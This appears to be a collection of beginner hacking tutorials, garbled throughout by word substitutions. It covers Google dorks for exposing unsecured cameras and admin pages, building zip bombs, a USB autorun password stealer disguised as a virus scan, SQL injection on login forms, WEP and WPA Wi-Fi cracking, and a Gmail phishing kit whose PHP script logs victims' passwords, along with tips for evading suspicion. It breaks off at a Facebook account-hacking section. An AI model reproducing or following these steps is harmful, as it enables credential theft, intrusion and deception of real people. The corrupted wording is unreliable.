Exploring Google

Introduction:Google tin be used for doing many things like calculating…..converting……comparing foods……getting important informations……even playing.

Lets cheque how yous can practice all this by a single click :

Notation:Dont forget to click "I'thou feeling lucky".

  • You can ask Google about festivities.

amazing-google-tricks-1

  • Yous can compare foods' nutritional facts.

amazing-google-tricks-13

  •  Blazon "Google Gravity" and so click "I'm feeling Lucky". Wait and see what happens.

amazing-google-tricks-22

  •  Type "tilt" and window volition tilt to the correct.

amazing-google-tricks-12

  • Type "Zerg Blitz" and defend your search results from Google's (Alphabet 'o')

amazing-google-tricks-8

  •  Y'all can use Google as a Calculator.

amazing-google-tricks-4

  •  If y'all insert a minus sign (-) in your search, Google volition eliminate it from your search.

amazing-google-tricks-2

Accessing unprotected cameras

Introduction:I have already posted on using Google Dorks If you wish to come across, Click HERE. At present I am just going to you lot how to admission unprotected cameras LIVE all over the world through Google Dorks.

So the heading sounds interesting. We tin admission the live cameras using google dorks.

Remember, cameras are present at many places in many countries then bask watching them and what is happening in them.
Just type this in google search box and hitting enter:

  • inurl:view/index.shtml .

Many of these wont ask for countersign, view might be dark (coz information technology would be night there) and yous demand good net speed . Have fun.

Download a long list of such dorks to view unprotected cameras and the software from Hither.

Google Dorks

Introduction:Do you know how to use Google? Sounds a dizzy question considering even children can hands utilise Google search engine. But the affair is that how efficiently we can make use of Google. Google dorks are naught merely unproblematic search operators that are used to refine our search. okay let'south suppose that y'all want to search for eBooks on topic 'networking' , our obvious search queries would be similar this "Networking eBooks", "free eBooks for networking" etc. ,we keep going into the websites, clicking on link subsequently links and then get proper downloading links. Now let'south practice the same search in a unlike way , blazon on Google "ext:pdf networking" (without quotes) and meet what you go in results, Google returned direct downloading links of eBooks on networking that is files with extension pdf.
I promise you have got an idea of Google dorks or Google search operators.

List of basic search operators, their description and examples.

1. Site– It returns the websites of specified domains.

Instance-site:explorehacking.com will render the links of webpages of domain explorehacking.com.site:explorehacking.com phishing will return all the webpages of domain explorehacking.com which comprise word 'phishing'.
Suppose you desire Google to return only government websites,
you can usesite:gov or say Pakistani websites applysite:pk

two.intitleand allintitle– It restricts the results to pages whose title contain specified word/phrase.

examples-
intitle:admin will return just those pages whose title contains word 'admin'.
intitle:admin login will return only those pages whose title contains discussion 'admin' and word 'login' can be in anywhere in page.

allintitle:admin login will render those pages whose championship contains both words admin and login. This is but equivalent tointitle:admin intitle:login

3.inurl– as clear from name, information technology restricts the results to sites whose URL'south contains specified phrase.

examples-
inurl:adminlogin will return only those pages whose URL contains  'adminlogin'.
Like allintitle, yous can similarly use allinurl. I dont feel there is demand to explicate allinurl.

  1. related– It returns the websites like to specified websites.examples :-
    related:www.mobivox.com, now mobivox.com provides complimentary/cheap calls facility. This search query would return results containing websites which provide such kind of services.

related:world wide web.hidemyass.com , at present hidemyass.com provides services to maintain anonymity using proxies.This search query would return results containing websites which provide services related to proxies.

five. cache: It returns the cached webpage that is kept with google.

example:-
enshroud:world wide web.explorehacking.com, this dork is very useful when actually the website is down and
you tin can still view its contents (from cached pages).

  1. ext– It specifies the extension .You can use 'filteype' at place of 'ext'.
    example-:
    ext:ppt hacking– this will return  powerpoint presentations (ppt files) on topic 'hackinext:doc hacking – this volition render microsoft word files on topic 'hacking'

     Extensions that google supports are pdf,swf,rtf,doc,ppt,dwf,ps,kml,kmz,xls.


    Annotation: Undoubtedly,you tin combine these search operators for example
    site:gov inurl:adminlogin will return the government site webpages who take give-and-take 'adminlogin' in URL.g'.I have likewise written another article on accessing unprotected cameras using google dorks if you wish to see click Here.

    Notation:These google dorks when used smartly are really useful from hacker'due south point of view to search for vulnerable websites. I will try to write a postal service regarding same.

Zip Bomb

Introduction: A zip bomb, also known as a decompression bomb (or the 'Zippo of Death' for the overly dramatic ones), is a malicious archive file designed to crash or return useless the plan or organisation reading it. It is oft employed to disable antivirus software, in order to create an opening for more traditional viruses. Rather than hijacking the normal operation of the plan, a zip bomb allows the program to piece of work every bit intended, but the archive is carefully crafted so that unpacking information technology (eastward.g. by a virus scanner in society to scan for viruses) requires inordinate amounts of time, disk space or memory.

The archetype zip bomb is a tiny cypher file, nearly are measured in kilobytes. However, when this file is unzipped its contents are more than what the system can handle (usually up to Petabyte, i.east 1000 Terabyte. Some go up to exabyte too). Yes, we're talking near stuffing exabyte of information into kilobytes. In my view, this ingenious lilliputian flim-flam is the product of "pure hacker mentality". In essence, it's zero like phishing or sessio hijacking or anything else that has put a bad proper name to "hackers". It's a unproblematic creative solution, an exploited loophole which truly shows: "Where there's a volition, there's a way". To sympathise how it works, we have to accept a piffling detour to see how information compression works (WinZip, WinRAR etc.)

Various compression software and tools make use of what'due south chosen "Lossless compression algorithms". As the name suggests, these algorithms strive to compress files without any loss of information. Clearly, when we compress a file we'd definitely want to go it dorsum in the same shape subsequently decompressing. These algorithms usually exploit statistical back-up in such a mode as to represent the sender's data more concisely without error. In English now: We know that the figurer merely understands 0's and 1's, So every single program or any information stored in your computer is actually only a serial of i'due south and 0'southward (Binary course). Allow's take an example that's not entirely correct but will help you understand the principle. Say, we've got a file which after being converted to binary language looks like "1110000101". Remember statistical redundancy that was mentioned earlier? Try to spot information technology in this string (1110000101). Statistical redundancy basically ways that the same thing is repeated over and over once again. In this string we see that at that place are three 1's followed by four 0's. Now take a look at this string: "3140101". What just happened here is compression. We can merely write a programme that codes and decodes files every bit higher up (Softwares like WinZip use a fancy form and overly complicated grade of what we did above). If the program finds repeating patterns, like a lot of 1's together, it may only replace all those i's by another number. Some other case, we find "111111111" somewhere in a program. That's nine 1'south in a row. What if we replace it by "91"? We tin just code our program to replace a "91" past writing "one" nine times, effectively reversing the process. Again, while decoding, if the program encounters any number other than 1 or 0, in our case 9, it can be instructed to write the successive number, in our case 1, nine times. So "91" gets converted back to "111111111". That'southward lossless pinch.

What about the previous cord (3140101)? On decompressing this, we get back 1110000101, that is, the original string. Like I said, this instance is not entirely accurate. Annotation that the reckoner only understands binary. Everything that you'll ever practise on a computer will have, at some point, been converted to binary grade. Actually the computer is forced to catechumen to something other than binary (similar english) only for us, dumb humans. Nosotros compressed "111111111" past writing "91". But the "9" in the "91" will also accept to again be converted into i's and 0'south. So our programme is quite buggy. Widely used programs like WinZip, WinRar, PowerISO etc. use various different algorithms for different cases.

Lossless pinch is possible because most real-globe data has statistical redundancy. Lossless pinch schemes are reversible so that the original data can be reconstructed.
However, lossless information pinch algorithms will ever neglect to shrink some files. Indeed, whatsoever compression algorithm will necessarily fail to compress any information containing no discernible patterns. Attempts to shrink data that has been compressed already may actually issue in an expansion, every bit will attempts to compress all only the nearly trivially encrypted information. This is why if you've ever tried "ZIPing" or "RARing" a file, you lot would have noticed in some cases it works dandy while in other cases it may not fifty-fifty reduce the file size by 5%. (WinRAR and WinZIP can exist considered the aforementioned for (most) all practical purposes. Their names differ more their compression abilities. Feel free to use either.)

Now, back to nada bombs. Earlier taking a deeper expect, let'due south go the basic pregnant cleared upward. Accept a new text file and write '0' a chiliad times. Salvage it, the file size should be merely around 1 kilobyte. Open information technology up, CTRL+A, CTRL+C,CTRL+V – i.e, copy the whole matter and then paste information technology. Do this ten times. Our file is now around 10kb, and completely made of 0's. Do this a few more than times. Faster than your expectations, the file size will apace climb into megabytes then gigabytes. In nearly cases, the notepad (or any text editor) volition actually brainstorm to lag since information technology has a ridiculous amount of 0'south open in the window. When that happens, that's your cue to slow down since different operating systems and softwares can have unexpected behavious when dealing with such big files. Practically, just keep information technology nether a few gigabytes and you should be fine.
(Fifty-fifty this may exist too much for some systems, I recommend pausing at nigh a 100 Mb and then slowly increasing the size. If the lag lasts longer than around 15 seconds, you've reached the limit.) So, we have a 5Gb text file (on an awesome computer) containing nothing but 0'south. A lilliputian perspective: That's over five-freaking-billion zeros that the innocent little notepad obediently handled in a few seconds. So the next time you're getting annoyed at your browser lagging a little bit, try taking a notebook and write down 5Gb worth of text. It's only off-white.

And we're back. What exercise we exercise now with that ridiculously large text file? Compress information technology and lookout man your seriously underappreciated computer practice magic. In the aforementioned directory, you'll at present run across the pointlessly large text file, and alongside it, a zip file that should be nether ane Megabyte. That'south similar stuffing 5000 assurance into the volume of one.

Now, for a deeper await let's bank check out the nearly famous zip bomb, the 42.zip file. It is a nil file consisting of 42 kilobytes of compressed data, containing v layers of nested zip files in sets of sixteen, each lesser layer archive containing a four.3 gigabyte (four 294 967 295 bytes; ~ iii.99 GiB) file for a total of four.5 petabytes (iv 503 599 626 321 920 bytes; ~ 3.99 PiB) of uncompressed data. This file is still available for download on various websites beyond the Net. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable corporeality of program execution time. Zip bombs oftentimes (if not ever) rely on repetition of identical files to achieve their farthermost compression ratios. Dynamic programming methods tin can be employed to limit traversal of such files, and then that just 1 file is followed recursively at each level – finer converting their exponential growth to linear.

(Here's a small website dedicated solely to the 42.zippo, http://world wide web.unforgettable.dk/ . You can ven download a set-made nothing bomb from here. Password for the zip file is '42'. The file has a password to protect users who have ancient antivirus software that is set to automatically scan all downloads)

Now, to avoid giving the wrong impression a myth needs to be disrepair. "Zilch Bomb" is not a very accurate name for this malicious file. If you extract a zip-bomb, it won't do anything to your figurer though, it'll simply create 16 smaller zip-bombs. If you lot decompress one of those it'll yield 16 more nothing-bombs. As such, they're not going to "explode" when someone opens them, they're just used by malware authors to knock out anti-virus software so malware tin can piece of work without needing to picket its back. What happens is, a malicious plan may found a zip bomb somewhere near it as bait for AV software. The program will expect until the anti-virus comes up for a routine scan, and it'll wait, "hiding" behind the zip-flop. When the anti-virus reaches the bomb, information technology'll try to open it, all in its express retentivity. 1 file becomes 16, which becomes 256, and it goes on until the retentivity is total. In reality though, the reckoner never runs out of memory because each procedure is only immune to use so much memory, subsequently it hits its limit it crashes itself to protect the rest of the reckoner from an OOM (Out-Of-Memory) result. When this happens to an anti-virus program as information technology's trying to dig into the file for malware, the software but crashes and exits, while leaving the residue of the figurer unharmed. The malware will detect this, and volition then employ that opportunity to exercise any it wants, without having to worry about AV software that might be right effectually the corner. Additionally, the nested archives make it much harder for programs similar virus scanners (the principal target of these "bombs") to be smart and turn down to unpack archives that are "too large", because until the last level the total amount of information is not "that much", you don't "see" how large the files at the lowest level are until yous have reached that level, by which time it is, of course, too late). All the same, well-nigh anti-virus software today recognizes a aught-bomb when it sees 1, and will skip over information technology, alerting the user that the computer might be infected with malware. They unremarkably get down to the 2d or third level before flagging the file.

Further, You wouldn't notice deejay infinite being used considering zip-bombs only decompress in an anti-virus program's memory, non to the disk. Almost transmission archive-opening programs don't even have a recursive opening way for this very reason. Plus y'all as well wouldn't notice much extra work past the CPU, because cypher-bombs work so fast they can knock out an inadequately protected anti-virus program in seconds, while only using a fraction of the full reckoner's memory.

The 42.zip is only i example, there are many more like this and you can create your own. A like file is an XML-based decompression bomb called "billion laughs" (or XML Bomb). Basically information technology crashes a web browser by causing the XML parser to run out of memory (Again, well-nigh browsers today volition find such recursive expansion and simply not try to parse the booby-trapped XML).

At that place's fifty-fifty a torrent for one of the largest (and smallest) zip bombs on the internet although it seems all the seeders take long gone. It's a 5.61 kilobyte aught file that expands to four zettabyte. Information technology seems to be at the absolute limit of aught bombs. Here'southward the KickAss Torrent link:

http://kickass.to/cypher-bomb-insanely-huge-zip-archive-4zb-t2105770.html

(Equally a claiming, you tin can try replicating it. The file construction has been explained in the link: 8 layers, 32 athenaeum in each layer, each archive containing a 4Gb file)

Let's walk through the process once once more. Make a 4 Gb text file full of 0's. Zip it. Permit's call information technology zip1. Create, say 10 copies of this zip file. We have 10 zip1's. Now, zip all ten zip1's again. Call it zip2. We're at the second level now and we tin can simply continue the process for as long as nosotros similar and the null file will just go along getting bigger and bigger. A mutual doubt is, How can we create a naught file that opens upward to a four Zettabyte size without having 4 Zettabyte memory on our computers? Actually, we don't even need x Gb for this. We merely took a 4Gb text file and zipped it (into zip1). We can simply delete the original text file as information technology is no longer required. All we demand is the commencement single tiny zip file and it is of this cipher file that we create more copies, zip them up, create more copies and zip again then on.

And that ends the story of the zip bomb. These actually come nether the class of logic bombs, which besides contains the fork bomb nosotros fabricated using batch files. Nevertheless again, the proper noun DDOS is going to pop up here. Zip bombs are basically DDOSers for antiviruses. Limited memory is a 'flaw' that has remained in all computers since their inception and hackers always discover a way to exploit it. When the old methods end working, new ones shortly pop upwardly and take their identify. DDOSing, Zip Bombs, Fork Bombs, XML bombs, PDF bombs, buffer overflows and what not. This shows what a crucial part of programming 'retentiveness direction' really is. And so, we live another day, fix to gainsay the adjacent trouble

Password Stealer

Introduction: There'southward a lot of people in the world and even more than online accounts. Every security system has a flaw and what we're going to discuss here is merely that. Well-nigh people, with their eyes on the clock and not a second to spare only tick "Remember Me" on various websites without a second thought thinking it's going to save their time. This is particularly common amid people who have a private system, perhaps a Laptop that nobody else ever touches or a PC which they have locked with a password. Non knowing that there exist many tools to "recover" saved passwords (More like to exploit exactly these naive people). Browsers store passwords and account details in cookies. What'due south quite surprising is just how little security they offering, even worse, none of the browsers seem to intendance about encrypting passwords. Most of them have an selection to "Testify Saved Passwords" in the options menu. We're going to cutting even that out, just plug-in a USB Take it out and Voila! nosotros have all the passwords. That is what you lot'll learn in this tutorial. So, with a goal in mind and non a second to spare, let'southward start right abroad.

Things you volition need (Come across link below):-

MessenPass – MessenPass is a password recovery tool that reveals the passwords of several common instant messenger applications.

Post PassView – Mail PassView is a small countersign-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc

IE Passview – IE passview is another small-scale program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) – Protected Storage PassView is a small utility that reveals the passwords stored on your computer past Cyberspace Explorer, Outlook Limited and MSN Explorer.

Password Fox – Countersign fox is a small program used to view Stored passwords in Mozilla Firefox. (These are the ones I've tried and tested. More like these surely be and you lot can ever Google it out for something perhaps better. At that place are analogous tools for the Chrome browser too. You can find these and tons more at http://www.nirsoft.net/)

So that'south that and now we are ready to create a USB countersign stealer.
Note: These programs tend to attract a lot of attention from antivirus softwares (Get used to this). Kindly disable your antivirus earlier performing these steps, at your own risk of course .

  •  First of all download all 5 tools in your USB. Nearly of them are simply some .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe). (You need the softwares completely on your pen bulldoze. Brand sure you take all the installation files in your USB[if whatever])
  • Create a new Notepad and write the post-obit text into it:

[autorun] open=launch.bat
Activity= Perform a Virus Browse

  • Save the Notepad and rename it from New Text Document.txt to autorun.inf
  • Now copy the autorun.inf file onto your USB pendrive.
  • Create another Notepad and write the following text onto it. (Yep, still no re-create-pasting allowed.)

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
beginning iepv.exe /stext iepv.txt
commencement pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

  • Salve the Notepad and rename it from New Text Document.txt to launch.bat
  • Copy the launch.bat file besides to your USB drive.

These were simple commands to first-up our password "recovering" programs as soon as we plug-in the USB. What we merely did here is just claw upward our launch.bat batch file to the autorun.inf file that automatically runs when the computer detects the USB. In the launch.bat, nosotros started up our programs and provided them with file names as parameters and then that each plan should put in the passwords in their respective .txt files.

Now your USB password stealer is ready. All you have to do is insert it in your victim's computer and a pop up volition appear, in the pop-upwards window select the option (Perform a virus browse) as soon equally you will click information technology, your USB password stealer will exercise information technology'south magic and all the passwords saved on the system volition be saved in a .txt file. I recommend y'all try it out on your own organisation kickoff to see how information technology should work.
Meet the final line of our autorun.inf, we are only specifying the text for the alert dialog. Y'all can blazon in anything yous think is the least suspicious.
This may not piece of work on all operating systems and all different browsers. Your best bet would be to pack in equally many diverse programs as you lot can for giving y'all the best chance. As well, note that the estimator should not have autorun feature disabled for the USB stealer to work.

Cheat Engine

Introduction: Hither'southward a seemingly a typical tutorial on hacking games, games are hacked and cracked by a software chosen Cheat engine. Crook Engine is an open source tool designed to help you to alter (mostly) single actor games and then the user can brand them harder or easier depending on their preference. (Example: If you detect that 100 HP is too easy on a particular game, you tin can effort playing a game with a maximum 10 HP as a challenge). Cheat Engine(CE) as well contains several other useful tools to help debugging and really just messing effectually with games and pretty much any applications.(Instance: Every bit a prank, ane may alter the download speed shown in a torrent customer/download manager to perhaps 100Gbps or something like that.)

CE likewise comes with a memory scanner to chop-chop scan for variables used within a game and allow you to modify them, but it also comes with a debugger, dis assembler, assembler, speedhack, trainer maker, direct 3D manipulation tools, system inspection tools etc. – The ultimate tool for a mischievous developer. And so, read on to find out how CE does it.

Although CE can do quite a bit more than, let's take a wait at an case of "hacking" a game. Now, every single application in that location is uses what's called "variables" to store various values. In a game, for example, the player'due south HP, level, ammo, position – literally everything is stored in certain variables. There could exist a carve up variable with values 0-100 keeping rail of hit points (HP), another variable keeping track of what level the user is currently in, and possibly three more keeping rail of the 10,Y,Z coordinates of the avatar or player in a 3-D game. Almost all new games these days run in cycles. What I mean past that is the game has a recurring infinite loop of some function (group of statements) that goes on and on until the histrion exits/pauses the game. Inside the loop, the function's code checks to meet if (example) any user event has occurred. Did the user press the pointer keys? If and then, and so update their position appropriately. Did s/he click the left mouse button? If and so, then subtract ammo by i and phone call the function to launch a projectile from the gun and then on. Certain aspects of games often rely completely on a particular variable and trust it to maintain a legit value. Because that the average user may never even know nigh the being of these background variables, it's a reasonably prophylactic bet. It's just a game subsequently all and implementing double checks, encrypted values and a sealed surroundings (sandbox) is only not worth spoiling the performance and gameplay. This pocket-sized point is what leaves almost every single player game vulnerable to nosy software such as Crook Engine.

This is also the reason why CE does non (yet) work for most large online games likes RuneScape, WoW, AoC etc. since the information and whatsoever changes done to it are always double checked with the server's copy. Whatever happens at the server, stays at the server and although you lot could make yourself LOOK like a pro, that will exist merely because of your dumb browser. (I.e., Like all applications, your browser also maintains variables which can be tampered with, but that doesn't affect the server'due south copy)

What CE does is trying to find out which variables the application is using, the addresses at which they are stored in the RAM and peradventure tamper with them according to what the user(you) may desire. For gamers, this tool is only god sent. You can increase your speed in "Demand for speed", go infinite ammo in "Call of Duty" and avoid killing a grand people or typing cheat codes for coin in "K theft Auto" and then much more.

Unwinding back, how does any of this relate to hacking? It all lies in feel. CE teaches you how to find out exactly what the trouble is and how to solve it. The procedure for tampering with games is very shut to what we will endeavor to accomplish in later, more advanced hacking techniques. CE gives you the feel and thrill of cracking a seemingly impossible trouble and teaches you lot how to wait for an open window when the door is locked – which is really a very authentic definition of hacking. CE gives you a hint, a glimpse of advanced hacking procedures to which nosotros shall become to later on. Off-white alert, in my experience I've noticed that the number ane reason for beginners giving upwardly early while learning hacking is but considering it merely gets a fiddling irksome. Outside of movies, that's only the manner it is. But for those willing to make the journey, the reward is more than worth it. I acknowledge that to truly enjoy using CE, yous have to exist somewhat of a gamer. Hacking depends on, more than anything else, practice considering exercise just can requite you the experience needed to truly hack like what you encounter in movies. (Yes, it's possible. Everything is..) CE is nowhere shut to a professional person hacking tool, but information technology'due south a step in the correct management (plus information technology'southward fun). For the programmers, as I mentioned earlier CE is open source – It'due south all out there waiting for you to explore. (Cheque out the official website given below)

This was more of an introduction than a tutorial and that'due south because CE comes packed upwards with it'south own first-class tutorial for it's usage. For beginners I recommend going through the tutorial(The one that comes with CE). Equally easy as I've made information technology sound, head over to the following website to download CE and see for yourself.

http://www.cheatengine.org/

Web Hacking

Introduction: If y'all have bones HTML and JavaScript knowledge, yous may be able to admission password protected websites. This commodity volition give you an piece of cake method to hack simple, less-secured websites of your choice only through HTML. Use it responsibly.Unfortunately Websites with robust security details will not be susceptible to this kind of simple assail.

Steps:

  • Open the site you lot desire to hack.
  • Provide wrong username/password combination in its log in form. (eastward.chiliad. : Username : me and Countersign: ' or 1=1 –)
  • An error will occur saying wrong username-password. Now be prepared your experiment starts from here.
  • Right click anywhere on that error page =>> go to view source.
  • In View the source code. In that location you can come across the HTML coding with JavaScript.
  •  There you find something like this….<_form action="…Login….">
  • Before this login data re-create the URL of the site in which you are. (east.g. :"< _form……….action=http://world wide web.targetwebsite.com/login…….>")
  • Delete the JavaScript from the above that validates your information in the server. Practise this very carefully.—Your success in hacking the site depends upon how efficiently yous delete the java script code that validates your account information.
  • Take a close expect for "<_input name="countersign" type="password">"[without quotes] -> replace "<_type=countersign>" with "<_type=text>".
  • See there if maximum length of password is less than 11 and so increase it to 11 (e.yard. : if then write ).
  • Become to file => salvage every bit and save it anywhere in your hard disk with ext.html (due east.g.: c:\chan.html).
  • Reopen your target spider web page by double clicking 'chan.html' file that you lot saved in your hard disk earlier.
  •  Yous see that some changes in current folio equally compared to original 1. Don't worry.
  • Provide whatsoever username [east.thousand.: hacker] and password [e.chiliad.:' or 1=ane –] You accept successfully cracked the in a higher place website and entered into the account of Listing user saved in the server's database.

(We are Done and you will be able to enter the website)

Wifi hacked

Introduction: WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng tin ONLY crack pre-shared keys. So make certain airodump-ng shows the network as having the authentication type of PSK, otherwise, it's simply uncrackable (yet). But well-nigh Networks practise apply PSK only, so your chances are adept. Before continuing on only take a look at what type of protection the network has.

The only time y'all can crack the pre-shared primal is if information technology is a lexicon discussion or relatively short in length. Conversely, if you lot desire to have an unbreakable wireless network at home, apply WPA/WPA2 and a 63 character countersign composed of random characters including special symbols. This is because in this Hack our only option is to use a Dictionary assault, that means literally test each and every word in a text file and checking whether it is the password. A uncomplicated google : "Lexicon assault list" will give you lot a text file containing all the known words, Pick the i that'south the biggest.

There is another important difference between smashing WPA/WPA2 and WEP which is the approach used to cleft the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods tin exist used to speed up the cracking process, only plain brute force techniques can exist used against WPA/WPA2. That is, considering the key is not static, so collecting IVs(more packets) like when keen WEP encryption, does not speed up the attack. The but thing that does give the information to first an attack is the handshake between client and AP. Handshaking is done when the customer connects to the network and attempts to authorize. Since the pre-shared cardinal tin can be from 8 to 63 characters in length, it effectively becomes impossible to cleft if the countersign is set to annihilation unusual, since even an 8 character password is virtually impossible to brute-forcefulness.

This means that the laissez passer phrase must be contained in the lexicon you are using to suspension WPA/WPA2. If it is non in the lexicon so aircrack-ng will be unable to decide the primal.

Likewise, there is no difference between dandy WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques y'all use are identical.

There's pretty much no steps in this tutorial. All y'all demand is the .cap file and a dictionary listing:

  • Cheque out the WEP cracking tutorial, complete till step 10. Then you'll have your .cap file which contains data most handshakes that aircrack uses to crack the key.
  • After you go the .cap file open Aircrack -ng, just on the first screen detect and select your .cap file, select WPA Encryption option and find and select your dictionary list. If the password is in the dictionary list, you'll see the magic happen and the key will announced.
  • You can simply try googling for a Dictionary WordList, there are tons out there .Endeavor as many as you can, and if possible compile several into 1 and let aircrack exercise information technology's thing overnight. Again, cracking WPA/WPA2 is much harder so you need probability on your side to take a real chance at getting the password.

I've noticed that in many cases, the WPA primal is just the mobile number of our naive victim. It'southward usually 10 characters, like shooting fish in a barrel to remember/blazon and luckily for us, relatively easy to crevice

Wifi hacked

Introduction:This is a tutorial for hacking WEP WiFi Connection, if you desire to Hack WPA/WPA2 then click here.

Tools Required:

1. CommView for WiFi: http://tamos.com/download/main/ca.php
2. Aircarck-NG GUI: http://aircrack-ng.org/

  • Install CommView. While installation you perchance asked whether y'all want to install the application in VoIP mode or Standard mode. Both manner will work fine for our example. But I usually used the VoIP fashion. It will automatically searches and installs the available drivers needed for making the wireless adapter to enable the parcel capture (by turning on promiscuous mode). Just allow it to install the needed drivers and you are expert to go to the next step. And please note that while using CommView, your WiFi networks volition become disconnected. Don't panic, yous are doing right!
  •  After the installation, start the application and click on the left pointer on the left side.
  • You volition be prompted with a new window. Click on the Start Scanning button.
  •  In the correct column, all the available networks around you will be shown. Merely click the network you want to become the password, and click on "Capture". Please note that, this tutorial is for WEP networks only!
  • At present the newly opened windows will exist airtight and you can now see that the CommView started capturing the packets.
  • Click on Settings> Options> Memory Usage. Change the value of maximum packets in buffer to 20000.
  • Now you can click on the logging tab. Select "Machine Logging". Enter 2000 in the "Maximum Directory Size" and 20 in the "Average Log File Size". We just told the CommView to capture *.ncp packets with each file of 20MB size and store information technology in the directory we chose.
  • Again become to "Logging" tab and select "Concatenate Logs" to join all the carve up logs of 20 MB nosotros just created. And now we take one *.ncf file.
  • Go to File>Log Viewer> Load CommView Logs> and choose the *.ncf file that we only got form the higher up Concatenation pace.
  • Click File> Export> Wireshark/Tco dump format. This will create a .cap file.
  • Get to the Aircrack application folder and then traverse to the bin file inside. Double click on Aircrack-ng GUI.exe in the application, choose the *.cap file we but created in the step 10.
  • And that's information technology! If you sufficient data to crack the password, y'all volition get the password. It is appropriate to go on from step 8 to 11 merely afterwards receiving enough packets. Yous will need a minimum of 100000 packets to start the great. Then afterward step 7, it is advisable to leave the system alone for 2-3 hours and so proceed to the farther steps!

NOTE:
Recently CommView became a paid software with a rather ridiculous price tag. Merely, no worries. At that place are more than enough alternatives. Some of them are mentioned below and tin exist used to obtain the .cap file as explained higher up:

•Cain $ Abel:
http://www.oxid.it/cain.html

•WireShark:
http://www.wireshark.org/

For nigh a couple dozen more than, check out the Wikipedia page (link below )list almost every packet analyzer:
http://en.wikipedia.org/wiki/Comparison_of_packet_analyzers

They all piece of work the same fashion, basically all we need is a ways to get the .cap file and after that the part of packet analyzer is over. For about purposes WireShark is more than enough, so kindly check out this 1 showtime. On a seemingly unrelated note, the war against piracy wages on and packet analyzer have become victims also. Proprietary softwares like CommView continue to exist easily available on torrent websites which shows just how harmful hacking can be to a company.

Phishing

Introduction:This tutorial will explain y'all how to create fake login page for phishing, in this case we are going to go with Gmail every bit an case. This Procedure can exist used to make simulated pages for whatever other website in the same way. Yahoo!, Facebook, MySpace – Any website you lot want can be fabricated using this tutorial.

  • Head over to the website gmail.com.
  • Right Click anywhere and Relieve the Page equally an HTML file.
  • One time you save the login folio completely, you will run across an HTML file and a folder with the proper noun something similar Email from google files.At that place will be two image files namely "google_transparent.gif", "mail_logo.png".
  • Now nosotros need to upload these images to any online image hosting website, for example – tinypic.com, postimage.com or photobucket.com.
  • After uploading go to the paradigm where you lot uploaded it and re-create the URL of each image.
  • Open the HTML file in whatsoever text editor like NotePad or MS Word.(You can use CTRL + F for the following)
  • Search for "google_transparent.gif" (without quotes) and replace it with corresponding URL. Search for "mail_logo.png" (without quotes) and supersede information technology with respective URL.
  • In the same file, Search for :action="https://world wide web.google.com/accounts/ServiceLoginAuth"
  • And replace it with :

activeness="http://yoursite.urlhere/login.php"

(You have to write down your imitation websites URL at that place, See Step 7 for creating it.)

  • At present save the file.
  • Now you need to create a PHP file chosen "login.php". So open upwards a text editor (similar NotePad) and type the following (You tin can copy information technology from this pastie):

<!–?php $handle = fopen("password.txt", "a");
fwrite($handle,$_POST["E-mail"]);
fwrite($handle,"\n"); fwrite($handle,$_POST["Passwd"]);
fwrite($handle,"\north");
fwrite($handle,"\n");
fclose($handle) ;
header("Location:https://www.google.com/accounts/ServiceLoginAuth");
go out;
?>

  • Now Salve it as login.php
  • Open up up notepad again and simply save a new file as "pswrds.txt" without any contents.(Empty file)

Now upload those 3 files(namely :- alphabetize.html, login.php, pswrds.txt) in whatever of subdomains Web hosting site. (Note: that web hosting service must have php characteristic.)
You can use the following sites:

110mb.com
spam.com
justfree.com
007sites.com
(or simply google it)

Follow the instructions in the Web hosting site and setup yous fake login folio. Make sure you lot name the URL something like g00gle.com or annihilation that you retrieve would be the least suspicious.(Only brand certain the URL doesn't stand out in the address bar every bit it may alert the victim.)

  • Create a fake email business relationship, that is if you lot adopt to send the phishing webpage link anonymously.
  • And now all you lot take to practise is send the victim something like: 'Gmail starts new feature : To use this service, log in to this folio' ,along with this send the link to your fake website.

Note: For user to believe change your phishing web folio url employ any of free brusque url sites similar : co.nr, co.cc,cz.cc
This volition make users to believe that it is correct url.
Withal, if you practice get caught deed like you had no inkling:

'OMG ! I logged in to that website too , I'm going to modify my pass now ! you do the aforementioned, quickly !'.

Protecting Yourself :
Phishing webpages are meant to fool the victim into thinking that the website they are logging into is genuine whereas information technology is really a completely unlike website. The only sure-fire way to protect oneself from beingness the victim is to e'er make sure that the website you are giving your account and countersign to is bona fide by only peaking at the address bar in your spider web browser. Also, avoid following any links from any dodgy websites, scam emails or fifty-fifty the comment sections in various places.
Anybody is guilty until proven innocent. Assume hostility or accept vulnerability.

Note: This method currently does not work. At the time of writing, the files we upload to the hosting website were the same as mentioned here. Equally of now, nevertheless, these files are nowhere to be institute. For some reason, the Gmail squad seems to modify and change the log in page almost every other week causing the phishing method to be slightly different every fourth dimension. Hence, kindly try out other hacking techniques for the time being. Since the phishing method is practically the aforementioned barring a few file names .You may also endeavour the same method with other websites (Yahoo!, Facebook etc.) on your own.

Facebook Hacking

Note: Reverse to popular belief at that place doesn't exist some hole-and-corner software where one tin can just put in an email id, printing "Enter" and all the passwords associated with that account magically appear. Hacking Facebook, like any other hack takes time, skill and effort. Also, the methods are much the same for hacking any type of account for that affair.

Methods:There are three main methods used when it comes to Hacking Facebook accounts. Briefly,They are :

  • Keyloggers : Making the victim open upward his account on a arrangement with a keylogger fastened/ Sending a remote keylogger to the victim.
  • Phishing : Making a fake login page and having the entered details sent to you lot.(This has been explained in the beginner department).
  • Social Engineering : This is merely a fancy term for making the victim give up vital data in a supposedly coincidental conversation. The data may be the user'southward recovery question'southward reply, which tin then be used to take over the account via : "Forgot your password? Click Here!" Button.

Warning:Some time ago, Facebook developers patched in a new security feature. In a nutshell, if Facebook detects that your IP accost is different from the usual(previously used) IP addresses, it may stop you lot from logging in without farther identity verification which may be, for example: an SMS lawmaking. Now this can potentially touch every type of hack, simply if information technology is in fact possible there is merely 1 way to know.
By doing it. Promise for the best, Set up for the worst.

  • Keyloggers:
